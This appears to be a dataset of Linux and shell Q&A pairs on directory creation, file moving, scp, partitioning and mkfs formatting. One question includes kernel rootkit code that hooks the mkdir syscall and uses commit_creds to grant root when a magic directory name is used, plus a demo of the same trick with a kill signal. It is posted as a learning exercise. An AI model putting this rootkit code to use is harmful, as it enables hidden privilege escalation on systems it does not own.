output
stringlengths 9
26.3k
| input
stringlengths 26
29.8k
| instruction
stringlengths 14
159
|
---|---|---|
for d in *;
do
cd $dAs far as I can tell this is the error. You've created a loop over your directories d. You cd into $d. But your loop never cd's back out
done
cd ..
doneSo on the second iteration with the second $d, you're still in the first subdir, which of course does not contain the second $d as a subsubdir.
Incidently you're ordering by increasing day, %d-%m-%Y. You're free to do that of course, but you might find ordering by year organises the dirs more tidily, %Y-%m-%d.
| I am trying to make a photo organizer with a zsh shell script. But i am having trouble creating sub directories within each main directory(based on date). Currently the script starts from a folder i created and gets one argument(the file it needs to edit, hence the first cd $1). Secondly, i do some name changing which is irrelevant for my question. Next i create a directory for each date and move the photo to the correct directory.
The issue is, i want to loop through each date folder and make 2 new sub directories(jpg and raw). But when i run the code i get an error that there is no such file or directory..
Here is my current script:
#!/bin/zsh.
cd $1
for i in *.JPG;
do
mv $i $(basename $i .JPG).jpg;
done
for i in *;
do
d=$(date -r "$i" +%d-%m-%Y)
mkdir -p "$d"
mv -- "$i" "$d/";
done
for d in *;
do
cd $d
for i in *.jpg;
do
mkdir -p "jpg"
mv -- "$i" "jpg";
done for i in *.NEF;
do
mkdir -p "raw"
mv -- "$i" "raw";
done
doneIf anyone knows where i made a mistake that would be really helpfull since i have no clue what goes wrong and there is no debugger in nano as far as i know.
Error
➜ files sh test2.sh sdcard1 test2.sh: line 16: cd: 05-03-2022: No such file or directory
mv: rename *.jpg to jpg/*.jpg: No such file or directory
mv: rename *.NEF to raw/*.NEF: No such file or directory
test2.sh: line 16: cd: 23-10-2021: No such file or directory
mv: rename *.jpg to jpg/*.jpg: No such file or directory
mv: rename *.NEF to raw/*.NEF: No such file or directory | How can i create sub directories within a directory? [closed] |
The kill command is built into zsh, therefore that is the process involved. mkdir is a separate command.
|
I am writing my own rootkit to learn about Linux kernels. I wanted to hook into a syscall and alter the credentials of the current task to be that of roots (i.e.euid=0). I saw you could do this with unused signals when running kill. If you hooked into kill you could grab the signal, check if it matches the one you set, and then run your function to alter the credentials giving the current user root.
However, this does not work when hooking into other syscalls like mkdir. This is because the current process when running mkdir is mkdir itself. However, the current process when running kill, is my zsh shell, therefore giving me root.
I wanted to get root when hooking mkdir but for the reasons mentioned above, this doesn't work and only changes mkdir to run as root, not my zsh instance.
I was reading some pages from LWN (https://static.lwn.net/images/pdf/LDD3/ch02.pdf) and it says "During the execution of a system call, such as open or read, the current process is the one that invoked the call." That leads me to believe the current process of mkdir should be zsh, as that is the process that invoked the call.
Here is my code hooking into mkdir
static asmlinkage long (*orig_mkdir)(const struct pt_regs *);asmlinkage int fh_sys_mkdir(const struct pt_regs *regs)
{
void set_root(void); printk(KERN_INFO "Intercepting mkdir call");
char __user *pathname = (char *)regs->di;
char dir[255] = {0}; long err = strncpy_from_user(dir, pathname, 254);
if (err > 0)
{
printk(KERN_INFO "rootkit: trying to create directory with name: %s\n", dir);
}
if ( (strcmp(dir, "GetR00t") == 0) )
{
//execl(SHELL, "sh", NULL);
printk(KERN_INFO "rootkit: giving root...\n");
set_root();
return 0;
} printk(KERN_INFO "ORIGINAL CALL");
return orig_mkdir(regs);
}
Here is how I am altering the credentials to achieve root.
void set_root(void)
{
printk(KERN_INFO "set_root called");
printk(KERN_INFO "The process is \"%s\" (pid %i)\n", current->comm, current->pid); struct cred *root;
root = prepare_creds();
if (root == NULL)
{
printk(KERN_INFO "root is NULL");
return;
} printk(KERN_INFO "Setting privileges... ");
/* Run through and set all the various *id's of the current user and set them all to 0 (root) */
root->uid.val = root->gid.val = 0;
root->euid.val = root->egid.val = 0;
root->suid.val = root->sgid.val = 0;
root->fsuid.val = root->fsgid.val = 0; /* Set the credentials to root */
printk(KERN_INFO "Commiting creds");
commit_creds(root); }Here is the logs showing the pid when i run kill and when i run mkdir:
$ sudo tail /var/log/syslog
[...SNIP...]
Jan 22 10:44:43 kali kernel: [ 6170.003662] The process is "mkdir" (pid 3338) //PID of current process when mkdir is ran
Jan 22 10:46:14 kali kernel: [ 6260.534752] The process is "zsh" (pid 1396) // PID of current process when kill is ranHere is a demo of how it works:
┌──(kali㉿kali)-[~/Documents]
└─$ mkdir GetR00t
┌──(kali㉿kali)-[~/Documents]
└─$
----------------------------------------
┌──(kali㉿kali)-[~/Documents]
└─$ kill -64 1
┌──(root💀kali)-[~/Documents]
└─# | why when hooking syscalls from the kernel, is the pid of kill, zsh, but the pid of mkdir is mkdir? |
I hope I understood what you wanted correctly...
#!/bin/bash -enew_directory=$1
fastq_file=$2mkdir -p $new_directory/$fastq_fileThe script accept two arguments. First is the first directory name, second is the second directory name.
./script 12345 folder2 |
I want to create a script that creates a new folder with the name of the first argument in the directory specified as the second argument.
#!/bin/bash -e## Passing Arguments (fastq data and directory where generate the output) into this script $fastq_file $new_directory## Create the new directorymkdir $new_directory/$fastq_file#I have also tried mkdir "$new_directory"/"$fastq_file"After saving and closing
I have tried to run the script with this
my_script 12345.fastq ./The desired output should be a new folder in the current directory called 12345
If the user instead of my_script 12345.fastq ./ would have been my_script 12345.fastq /home/folder1/folder2
I would like to get a new folder called 12345 in the directory /home/folder1/folder2
However, after many attends I always get the error: mkdir: cannot create directory `/': File exists
| Creating a directory from many variables |
Your script can't do what you want. As written, it will only ever copy files on remote hosts to /tmp/$SG/$i on the same remote host.
You need to use scp instead of ssh and cp. For example:
SG=rohos
date
for i in $(awk "/$SG-/ {print \$2}" /etc/hosts); do
echo "Logging into $i"
mkdir -p "/tmp/$SG/$i"
scp -i /root/.ssh/vm_private_key "keyless-user@$i:/var/some.log" "/tmp/${SG}/${i}/"
doneIf you want to preserve the timestamps and permissions of the copied files, add -p to the scp command's options. or add -r for a recursive copy of entire directory trees.
See man scp for details of scp and its options.
|
Have multiple vm machines that am using for studying, and have come up with this script for copying some files from vm's to my local machine:
SG=rohos; date; for i in `cat /etc/hosts | grep "$SG-" | awk '{print $2}'` ;do echo "Logging into ${i}";ssh -i /root/.ssh/vm_private_key keyless-user@${i} "sudo mkdir -p /tmp/${SG}/${i}; sudo cp /var/some.log /tmp/${SG}/${i}/ ";doneWhat could be changed in this script so that multiple typing of destination directories for mkdir and cp could be avoided? Or if you have a better tool like rsync or something else please enlighten me.SG=rohos
date
for i in `cat /etc/hosts | grep "$SG-" | awk '{print $2}'`
do
echo "Logging into ${i}"
ssh -i /root/.ssh/vm_private_key keyless-user@${i} "sudo mkdir -p /tmp/${SG}/${i}; sudo cp /var/some.log /tmp/${SG}/${i}/ "
done | copy files from multiple remote machines to local and create directories for remote machines |
For this answer I used the following tools:Bash
comm
find
xargsI recommend you to use the GNU version of the last 3 utilities as they can deal with NUL-delimited records.
First, let's declare some variables. It's necessary to use absolute pathnames in all these variables as we'll be changing directories many times:
# The directories that will be compared
original_dir='/path/to/original/directory'
copy_dir='/path/to/copy/directory'# Text files where we will save the structure of both directories
original_structure="${HOME}/original_structure.txt"
copy_structure="${HOME}/copy_structure.txt"# Text files where we will separate each subdirectory
# depending on the action we will perform on them
dirs_to_add="${HOME}/dirs_to_add.txt"
dirs_to_remove="${HOME}/dirs_to_remove.txt"Save the current structure of both directories:
cd -- "${original_dir}"
find . \! -name '.' -type 'd' -print0 | sort -z > "${original_structure}"cd -- "${copy_dir}"
find . \! -name '.' -type 'd' -print0 | sort -z > "${copy_structure}"Save the differences between both structures:
comm -23 -z -- "${original_structure}" "${copy_structure}" > "${dirs_to_add}"
comm -13 -z -- "${original_structure}" "${copy_structure}" > "${dirs_to_remove}"Create the missing directories:
cd -- "${copy_dir}"
xargs -0 mkdir -p -- < "${dirs_to_add}"Remove the unwanted directories:
cd -- "${copy_dir}"
xargs -0 rm -rf -- < "${dirs_to_remove}"Remove the text files we created to save the temporal information:
rm -- "${original_structure}" "${copy_structure}"
rm -- "${dirs_to_add}" "${dirs_to_remove}"NotesThis method only copies the structure. It doesn't preserve owners, permissions or attributes. I read that some other tools, like rsync, could preserve them, but I have no experience using them.If you want to put the code above into a script, make sure to implement error handling. For instance, failing to cd into a directory and operating in the incorrect one may lead to catastrophic consequences. |
I have a directory that has some subdirectories with files in them. I have another directory that has very similar subdirectories but there may be a few that are added or removed. How can I add and remove subdirectories so the two directories have the same structure?
Is there a simple way to do this using a command or tool? Or do I have to do something more complicated like search through every subdirectory and check if it has a matching one?
| How to make sure directory only has specific subdirectories? |
Solution found
ssh remote mkdir -p -v 'I\ want\ to\ create\ long\ dirname\ with\ spaces'I don't understand why on remote is different and I have to escape with \.
| Two slackware 14.2 systems,ssh is 7.9p1.
On local system
mkdir -p -v "I want to create long dir name with spaces"
mkdir: directory 'I want to create long dir name with spaces' createdAnd is OK
On remote
ssh remote mkdir -p -v "I want to create long dir name with spaces"
mkdir: created directory 'I'
mkdir: created directory 'want'
mkdir: created directory 'to'
mkdir: created directory 'create'
mkdir: created directory 'long'
mkdir: created directory 'dir'
mkdir: created directory 'name'
mkdir: created directory 'with'
mkdir: created directory 'spaces'Why?
I have tried using ' instead of " and
ssh remote mkdir -p -v 'I want to create long dir name with spaces'Exit with 0(success) but no dir created
| Why mkdir with ssh doesn't want create longname dir? [duplicate] |
I solved it like this
#!/bin/bash
for f in {100..2} ; do mv $f $((f+1)); done
x="?_1"
y=$(echo $x | cut -b 1-1)
mv $x $yIt's very manual, but solves faster the initial problem.
|
I have x number of folders
folder1
folder2
folder3
......
folder100What I want to do is;
add folder2
reorderSo now:
folder1
folder2
folder3
......
folder101So now, the folder that was folder2 is folder3, and etc.
Example:
folder2 -> folder3, folder3 -> folder4, folder4 -> folder5
The folder1 remain intact.
To be more precise I want to automate this
$ mkdir 1 2 3 4 5
$ ls
1 2 3 4 5
$ mkdir 2_1
$ ls
1 2 2_1 3 4 5
$ mv 5 6
$ ls
1 2 2_1 3 4 6
$ mv 4 5
$ mv 3 4
$ mv 2 3
$ mv 2_1 2
$ ls
1 2 3 4 5 6
$How do I do this in bash?
| Add a folder in a sequence of folders and rename the other folders |
It is not limited to a fixed number of dirs, so if you want to create 2, 3 or pass your entire life creating directories and sub-directories, until causing a explosion, here is the script:
#!/bin/bash
enter_recursive(){
while true; do
echo "Please enter the name of the directory you want to create inside $PWD or type _up to exit the directory"
read dir
[ "$dir" = "_up" ] && return
mkdir "$dir"
echo -n "Do you want to create subdirectories in $PWD/${dir}? (y/n)"
read -n1 yn
echo
if [ "$yn" == "y" ]; then
cd "$dir"
enter_recursive
cd ..
fidone
}enter_recursive |
On my CentOS machine, I need to create a main directory inside which I will have a few sub directories and, inside them, some subsubdirectories.
Something like:
main_directory->sub1,sub2,sb3..
sub1->subsub1,subsub2,subsub3..
sub2->subsub1,subsub2,subsub3..
sub3->subsub1,subsub2,subsub3..I want to create this kind of directory structure using a loop and using mkdir inside the loop. Also, I want the user to input all these directories and sub directories and sub sub directory names. How can I do this?
| Sub Directories in sub directory using loop |
Creating a filesystem on a whole disk rather than a partition is possible, but unusual. The documentation only explicitly mentions the partition because that's the most usual case (it does say usually). You can create a filesystem on anything that acts sufficiently like a fixed-size file, i.e. something where if you write data at a certain location and read back from the same location then you get back the same data. This includes whole disks, disk partitions, and other kinds of block devices, as well as regular files (disk images).
After doing mkfs.fat -n A /dev/sdb, you no longer have a partition on that disk. Beware that the kernel still thinks that the disk has a partition, because it keeps the partition table cached in memory. But you shouldn't try to use /dev/sdb1 anymore, since it no longer exists; writing to it would corrupt the filesystem you created on /dev/sdb since /dev/sdb1 is a part of /dev/sdb (everything except a few hundred bytes at the beginning). Run the command partprobe as root to tell the kernel to re-read the partition table.
While creating a filesystem on a whole disk is possible, I don't recommend it. Some operating systems may have problems with it (I think Windows would cope but some devices such as cameras might not), and you lose the possibility of creating other partitions. See also The merits of a partitionless filesystem
|
I have a pen drive and one partition:
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 931.5G 0 disk
└─sda1 8:1 0 931.5G 0 part /
sdb 8:16 1 7.5G 0 disk
└─sdb1 8:17 1 7.5G 0 partand I have formatted with command:
# mkfs.fat -n A /dev/sdband it works fine.
But after then, I skimmed though the man page for mkfs:
mkfs is used to build a Linux filesystem on a device, usually a hard
disk partition. The device argument is either the device name (e.g.
/dev/hda1, /dev/sdb2), or a regular file that shall contain the
filesystem. The size argument is the number of blocks to be used for
the filesystem.It says mkfs should work with partition number. And my problem is why my operation works without error prompt?
| Is it ok to mkfs without partition number? |
Do you have /sbin in your path?
Most likely you are trying to run mkfs.ext4 as a normal user.
Unless you've added it yourself (e.g. in ~/.bashrc or /etc/profile etc), root has /sbin and /usr/sbin in $PATH, but normal users don't by default.
Try running it from a root shell (e.g. after sudo -i) or as:
sudo mkfs.ext4 -L hdd_misha /dev/sdb1BTW, normal users usually don't have the necessary permissions to use mkfsto format a partition (although they can format a disk-image file that they own - e.g. for use with FUSE or in a VM with, say, VirtualBox).
Formatting a partition requires root privs unless someone has seriously messed up the block device permissions in /dev.
|
I have just installed Debian 8.4 (Jessie, MATE desktop). For some reason the following command is not recognized:
mkfs.ext4 -L hdd_misha /dev/sdb1The error I get:
bash: mkfs.ext4: command not foundI have googled and I actually can't seen to find Debian-specific instructions on how to create an ext4 filesystem. Any help much appreciated!
| mkfs.ext4 command not found in Debian (Jessie) |
Alignment doesn’t matter for the end sector, at least not for performance reasons. Alignment of the start sector affects all the sectors in the partition; alignment of the last sector only affects the last few sectors of the partition, if at all.
Sectors are numbered from 0; fdisk is suggesting the last sector on your disk (which has 250069680 sectors).
Start: 2048
End: 250069679
Sectors: 250067632is correct, 250069679 minus 2048 plus one is 250067632: the partition contains 250067632 sectors, starting at offset 2048. Note that this is aligned to 4096 bytes: 250067632 is a multiple of 8 (the sectors contain 512 bytes here, and 8×512 is 4096).
Depending on how you use the partition, alignment of the end sector might be important; for example, if you’re partitioning a 512e disk (a disk which uses 4096-byte sectors internally, but exposes 512-byte logical sectors), and want to use it with cryptsetup and 4096-byte blocks to improve performance (cryptsetup luksFormat --sector-size=4096), you’ll have to ensure that the partition contains an exact multiple of 4096 bytes (not sectors).
|
I am wondering what Start and End value to choose when partitioning my ext. SSD using fdisk.
fdisk suggests 2048-250069679, default 2048 but 250069679 cannot be divided by 512 nor by 2048. Wouldn't it be better to set the Start and End value to a number that can be divided by 512 or 2048 or 4096?
For example: Start 4096 and End 250068992 Command (m for help): pDisk /dev/sda: 119,2 GiB, 128035676160 bytes, 250069680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa4b57300Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-250069679, default 2048):
Last sector, +sectors or +size{K,M,G,T,P} (2048-250069679, default 250069679): Created a new partition 1 of type 'Linux' and of size 119,2 GiB.Command (m for help): p
Disk /dev/sda: 119,2 GiB, 128035676160 bytes, 250069680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa4b57300Device Boot Start End Sectors Size Id Type
/dev/sda1 2048 250069679 250067632 119,2G 83 LinuxCommand (m for help): i
Selected partition 1
Device: /dev/sda1
Start: 2048
End: 250069679
Sectors: 250067632
Cylinders: 15566
Size: 119,2G
Id: 83
Type: Linux
Start-C/H/S: 0/32/33
End-C/H/S: 206/29/63mkfs.ext4 /dev/sda1
mke2fs 1.43.4 (31-Jan-2017)
Ein Dateisystems mit 31258454 (4k) Blöcken und 7815168 Inodes wird erzeugt.
UUID des Dateisystems: fdce9286-4545-447c-9cca-7d67f5bb9f43
Superblock-Sicherungskopien gespeichert in den Blöcken:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872fdisk -l
Disk /dev/sda: 119,2 GiB, 128035676160 bytes, 250069680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa4b57300Device Boot Start End Sectors Size Id Type
/dev/sda1 2048 250069679 250067632 119,2G 83 LinuxAnd how can it be that the Sectors number is lower than the End value?Command (m for help): i
Selected partition 1
Device: /dev/sda1
Start: 2048
End: 250069679
Sectors: 250067632
Cylinders: 15566
Size: 119,2G
Id: 83
Type: Linux
Start-C/H/S: 0/32/33
End-C/H/S: 206/29/63 | How to calculate partition Start End Sector? |
You want to format a partition in a disk-image file, rather than the entire image file. In that case, you need to use losetup to tell linux to use the image file as a loopback device.
NOTE: losetup requires root privileges, so must be run as root or with sudo. The /dev/loop* devices it uses/creates also require root privs to access and use.
e.g (as root)
# losetup /dev/loop0 ./sdcard.img# fdisk -l /dev/loop0
Disk /dev/loop0: 1 MiB, 1048576 bytes, 2048 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x54c246abDevice Boot Start End Sectors Size Id Type
/dev/loop0p1 1 1023 1023 511.5K c W95 FAT32 (LBA)
/dev/loop0p2 1024 2047 1024 512K 83 Linux# file -s /dev/loop0p1
/dev/loop0p1: data# mkfs.vfat /dev/loop0p1
mkfs.fat 3.0.28 (2015-05-16)
Loop device does not match a floppy size, using default hd params# file -s /dev/loop0p1
/dev/loop0p1: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "mkfs.fat", sectors/cluster 4, root entries 512, sectors 1023 (volumes <=32 MB) , Media descriptor 0xf8, sectors/FAT 1, sectors/track 32, heads 64, serial number 0xfa9e3726, unlabeled, FAT (12 bit)and, finally, detach the image from the loopback device:
# losetup -d /dev/loop0See man losetup for more details.
|
I am creating an empty file...
dd if=/dev/zero of=${SDCARD} bs=1 count=0 seek=$(expr 1024 \* ${SDCARD_SIZE})...then turning it into an drive image...
parted -s ${SDCARD} mklabel msdos...and creating partitions on it
parted -s ${SDCARD} unit KiB mkpart primary fat32 ${IMAGE_ROOTFS_ALIGNMENT} $(expr ${IMAGE_ROOTFS_ALIGNMENT} \+ ${BOOT_SPACE_ALIGNED})
parted -s ${SDCARD} unit KiB mkpart primary $(expr ${IMAGE_ROOTFS_ALIGNMENT} \+ ${BOOT_SPACE_ALIGNED}) $(expr ${IMAGE_ROOTFS_ALIGNMENT} \+ ${BOOT_SPACE_ALIGNED} \+ $ROOTFS_SIZE)How do I use mkfs.ext and mkfs.vfat without mounting this image?
| How to run mkfs on file image partitions without mounting? |
A partition can have a type. The partition type is a hint as in "this partition is designated to serve a certain function". Many partition types are associated with certain file-systems, though the association is not always strict or unambiguous. You can expect a partition of type 0x07 to have a Microsoft compatible file-system (e.g. FAT, NTFS or exFAT) and 0x83 to have a native Linux file-system (e.g. ext2/3/4).
The creation of the file-system is indeed a completely independent and orthogonal step (you can put whatever file-system wherever you want – just do not expect things to work out of the box).
parted defines the partition as in "a part of the overall disk". It does not actually need to know the partition type (the parameter is optional). In use however, auto-detection of the file-system and henceforth auto-mounting may not work properly if the partition type does not correctly hint to the file-system.
A partition is a strictly linear piece of storage space. The mkfs.ext4 and its variants create file-systems so you can have your actual directory tree where you can conveniently store your named files in.
|
I am partitioning a disk with the intent to have an ext4 filesystem on the partition. I am following a tutorial, which indicates that there are two separate steps where the ext4 filesystem needs to be specified. The first is by parted when creating the partition:
sudo parted -a opt /dev/sda mkpart primary ext4 0% 100%
The second is by the mkfs.ext4 utility, which creates the filesystem itself:
sudo mkfs.ext4 -L datapartition /dev/sda1
My question is: what exactly are each of these tools doing? Why is ext4 required when creating the partition? I would have thought the defining of the partition itself was somewhat independent of the constituent file system.
(The tutorial I'm following is here: https://www.digitalocean.com/community/tutorials/how-to-partition-and-format-storage-devices-in-linux)
| Why does parted need a filesystem type when creating a partition, and how does its action differ from a utility like mkfs.ext4? |
Or you could simply use ext2
For ext4:mke2fs -t ext4 -O ^has_journal,^uninit_bg,^ext_attr,^huge_file,^64bit [/dev/device or /path/to/file]
man ext4 contains a whole lot of features you can disable (using ^).
|
I have a small "rescue" system (16MB) that I boot into RAM as ramdisk. The initrd disk that I am preparing needs to be formatted. I think ext4 will do fine, but obviously, it doesn't make any sense to use journal or other advanced ext4 features.
How can I create the most minimal ext4 filesystem?without journal
without any lazy_init
without any extended attributes
without ACL without large files
without resizing support
without any unnecessary metadataThe most bare minimum filesystem possible?
| Minimalistic ext4 filesystem without journal and other advanced features |
TRIM is a command that needs to be sent for individual blocks. I have asked the question before (What is the recommended way to empty a SSD?) and it is suggested to use ATA Secure Erase, a command that is sent to the device to clear all data.
|
Will a standard fresh linux (Ubuntu 11.10 to be exact) install and drive re-format (full) successfully TRIM my SSD, or do I need to do something extra?
I know that ext4 will TRIM blocks on erase when I specify the discard option, but I want to start with a completely TRIMmed drive if possible.
| Will formatting my drive TRIM my SSD? |
This is due to the fact that the hyperconverged hypervisor uses SSD's. The mkfs command formats with NODISCARD (also known as TRIM) by default.
To run mkfs without trim, use the -K option on XFS and -E nodiscard on ext4
XFS
mkfs.xfs -K /dev/sdx EXT4
mkfs.ext4 -E nodiscard Warning: Only use -K or -E on new volumes with no existing data.
Using the -K or -E options on drives with existing data, will cause the space to be wasted until the data is overwritten.
|
Formatting xfs volumes on ubuntu 16.04 is extremely slow in our Virtualbox hypervisor, but not vms running inside Nutanix.
Virtualbox
100 GB => seconds
2TB => seconds
Nutanix (HyperConverged)
100 GB => 4 minutes
2TB => 30+ minutes
parted -l -s | grep "Error: * unrecognised disk label"
Error: /dev/sdg: unrecognised disk labelparted /dev/sdg mklabel gpt
Information: You may need to update /etc/fstab.parted -- /dev/sdg mkpart primary xfs 1 -1
Information: You may need to update /etc/fstab.time mkfs.xfs /dev/sdg1
meta-data=/dev/sdg1 isize=512 agcount=4, agsize=6553472 blks
= sectsz=4096 attr=2, projid32bit=1
= crc=1 finobt=1, sparse=0
data = bsize=4096 blocks=26213888, imaxpct=25
= sunit=0 swidth=0 blks
naming =version 2 bsize=4096 ascii-ci=0 ftype=1
log =internal log bsize=4096 blocks=12799, version=2
= sectsz=4096 sunit=1 blks, lazy-count=1
realtime =none extsz=4096 blocks=0, rtextents=0real 4m7.653s
user 0m0.004s
sys 0m0.028sWhy does it take so long in one hypervisor to format a drive with mkfs, whereas on the other it is nearly instant?
| mkfs is extremely slow |
You could use GUI applications like GParted on Ubuntu.
Install them from the repositories using:
sudo apt-get install gpartedOnce you have it installed, select the correct block device/partition and format it using a filesystem like ext2/3/4, JFS, XFS, ResiserFS, etc depending on your needs.
However, the above mentioned file systems are only for reference. Not all of them run on all distributions perfectly.
For example, as @Nils pointed out: RiserFS is not suppported any more on some major distributions.
JFS and XFS can be too new for some distributions.
Ext2 is too old.Ext2 is almost a legacy file system now and not a very good choice.
That leaves only Ext3 and Ext4.
Again, since ext4 is still new and under development, it may have problems with a few distributions. For example, on RH5 there is no ext4, on SLES10 it is a bit dicey. However, I should point out here that the vanilla Linux kernel completely supports ext4 since version 2.6.28. On Arch and Gentoo ext4 gives no problems.
But ext3 will work an any current distribution - not only the newest ones.
|
How do I format my external hard drive to a very Linux compatible file system?
| Format external hard drive to linux compatible file system |
LVM doesn't change the way you format a partition. Let's say you would have a volume group called group1 and a logical volume called volume1 then your command should look like this for ext3:
mkfs.ext3 /dev/group1/volume1In case you don't have any volume groups or logical volumes yet, you have to use the according LVM tools to create them. The manpages of vgcreate and lvcreate can tell you how to do that.
| I need to format a partition.
But I have one LVM on my machine (VirtualBox) that is composed of two different two partitions of two Virtual HDD's (sdb5 and sdc5)
fdisk output
df output | How to Format an LVM partition [closed] |
I actually suspect you are being bitten by a much talked ext4 corruption bug in kernel 3 and 4. Have a look at this thread,
http://bugzilla.kernel.org/show_bug.cgi?id=89621
There have been constant reports of corruption bugs with ext4 file systems, with varying setups. Lots of people complaining in forums. The bug seems to affect more people with RAID configurations.
However, they are supposedly fixed in 4.0.3.
"4.0.3 includes a fix for a critical ext4 bug that can result in major data loss."
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=785672
There are other ext4 bugs, including bugs fixed as of the 30th of November [of 2015].
https://lists.ubuntu.com/archives/foundations-bugs/2015-November/259035.html
There is also here a very interesting article talking about configuration options in ext4, and possible corruption with it with power failures.
http://www.pointsoftware.ch/en/4-ext4-vs-ext3-filesystem-and-why-delayed-allocation-is-bad/
I would test the card with other filesystem other than ext4, maybe ext3.
Those systematic bugs with ext4 are one of the reasons I am using linux-image-4.3.0-0.bpo.1-amd64 from the debian backports repository in Jessie in my server farm at work.
Your version in particular, kernel 3.13 seems to be more affected by the bug.
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1298972
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1389787
I would not put it aside maybe some combination of configuration and hardware at your side is triggering the bug more than usual.
SD cards also go bad with wear and tear, and due to the journaling filesystem, an ext4fs system is not the ideal for an SD card. As a curiosity, I am using a Lamobo R1 and using the SD card just for booting the kernel, with an SSD disk.
http://linux-sunxi.org/Lamobo_R1
|
I am trying to format an sdcard following this guide. I am able to successfully create the partition table, but attempting to format the Linux partition with mkfs yields the following output:
mke2fs 1.42.9 (4-Feb-2014)
Discarding device blocks: 4096/1900544where it appears to hang indefinitely. I have left the process running for a while but nothing changes. If I eject the sdcard then mkfs writes the expected output to the terminal:
mke2fs 1.42.9 (4-Feb-2014)
Discarding device blocks: failed - Input/output error
Warning: could not erase sector 2: Attempt to write block to filesystem resulted in short write
warning: 512 blocks unused.Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
476064 inodes, 1900544 blocks
95026 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=1946157056
58 block groups
32768 blocks per group, 32768 fragments per group
8208 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632Allocating group tables: done
Warning: could not read block 0: Attempt to read block from filesystem resulted in short read
Warning: could not erase sector 0: Attempt to write block to filesystem resulted in short write
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: 0/58
Warning, had trouble writing out superblocks.Why is mkfs reporting that we are "discarding" blocks and what might be causing the hangup? EDIT
I am able to successfully create two partitions -- one at 100MB and the other 7.3GB. I then can format, and mount, the 100MB partition as FAT32 -- it's the ext4 7.3GB partition that is having this trouble.
dmesg is flooded with:
[ 9350.097112] mmc0: Got data interrupt 0x02000000 even though no data operation was in progress.
[ 9360.122946] mmc0: Timeout waiting for hardware interrupt.
[ 9360.125083] mmc_erase: erase error -110, status 0x0
[ 9360.125086] end_request: I/O error, dev mmcblk0, sector 3096576EDIT 2
It appears the problem manifests when I am attempting to format as ext4. If I format the 7.3GB partition as FAT32, as an example, the operation succeeds.
EDIT 2
To interestingly conclude the above, I inserted the sdcard into a BeagleBone and formatted it in the exact same way I was on Mint and everything worked flawlessly. I removed the sdcard, reinserted it into my main machine and finished copying over the data to the newly created and formatted partitions.
| Formatting an sdcard with mkfs hangs indefinitely |
On BSD-derived Unix systems, newfs is more commonly used than mkfs.
Under Mac OS X, you would use newfs_type as the command, where type is one of hfs, msdos, exfat or udf. There are man pages for all of these. As the other answer mentions, you can use diskutil to create filestems but by using the newfs variants you can set specific filesystem parameters unavailable via diskutil.
|
How do you make filesystems in OSX? Mac OSX doesn't have the mkfs command.
| How do you make filesystems in mac OSX |
You can use graphical tools to achieve this, such as GParted. You can install this like so:
apt-get update
apt-get install gpartedYour OS may also include a graphical package manager, if so, you can alternatively install the gparted package from there.
After gparted is installed, run it. Select your flash drive (be careful, make sure it is the right device by checking the size, name, and existing partitions), and delete all of the existing partitions. Then, create a new filesystem that spans the disk, and tell gparted to format it to ext4 (which is probably the filesystem you want), then click OK.
Command line alternative
Alternatively, you can also do this with fdisk and the filesystem's mkfs tool. Assuming the relevant block device is /dev/sdb (check using fdisk -l and/or blkid, it is very possible that it is not) and you want to format to ext4 (you probably do):
# Create partition scheme
fdisk /dev/sdb << 'EOF'
o
n
p
1w
EOF
# Format partition 1
mkfs.ext4 /dev/sdb1If you only want one partition, it is also possible to create it with no partition table:
mkfs.ext4 /dev/sdb | I've just installed Linux Mint 14. Now I need to format my USB drive, but I'm not getting any option to do that.
How can I do that with a GUI?
| How to format USB drive in Linux Mint 14 with GUI? [duplicate] |
Unless it's write protected with a hardware switch, that shouldn't matter. You will need to be root.
I assume that by 'format' you mean to delete all the files and recreate the file system.
To do this use parted or gparted to create a new partition.
GParted is easy -- it's a graphical application, while parted is from the command line.
But essentially just find which device your drive is (probably /dev/sdb or sdc some letter after a) and delete the old partition and make a new one.
FAT32 is probably the file system you want, but that's up to you.
GParted is pretty easy installs in gnome, probably in your distro's repositories, parted has man pages if you want to go that route and is probably already installed.
That's pretty much it, but it won't wipe data clean, (i.e. CSI / identity thieves could still get to your data; to do that, you can use dd to copy over every thing from /dev/zero, but I won't go in to that unless you ask).
|
How can I format the write protected pendrive?
| How to format a write protected pen drive in Linux? |
This is supported in the installer. To choose the usage type of a partition created during installation, you need to proceed as follows:when you get to the partition phase, select “Manual” (you can still have guided partitioning in the manual partitioning tool)
choose the drive you want to partition
confirm you want to create a partition table (if necessary)
choose the free space
create your partitions (you can select “Automatically partition the free space” here to have the installer create them for you)
once your partitions have been created, you’ll return to the list of drives and partitions
choose the partition (or logical volume if you’re using LVM) whose usage you want to change
select “Typical usage” (which should be “standard” by default)
at this point, on Ext4, you can choose the usage you want from “standard”, “news” (lots of inodes), “largefile” (fewer inodes), “largefile4” (even fewer inodes)
select “Done setting up the partition” to return to the list of drives and partitions
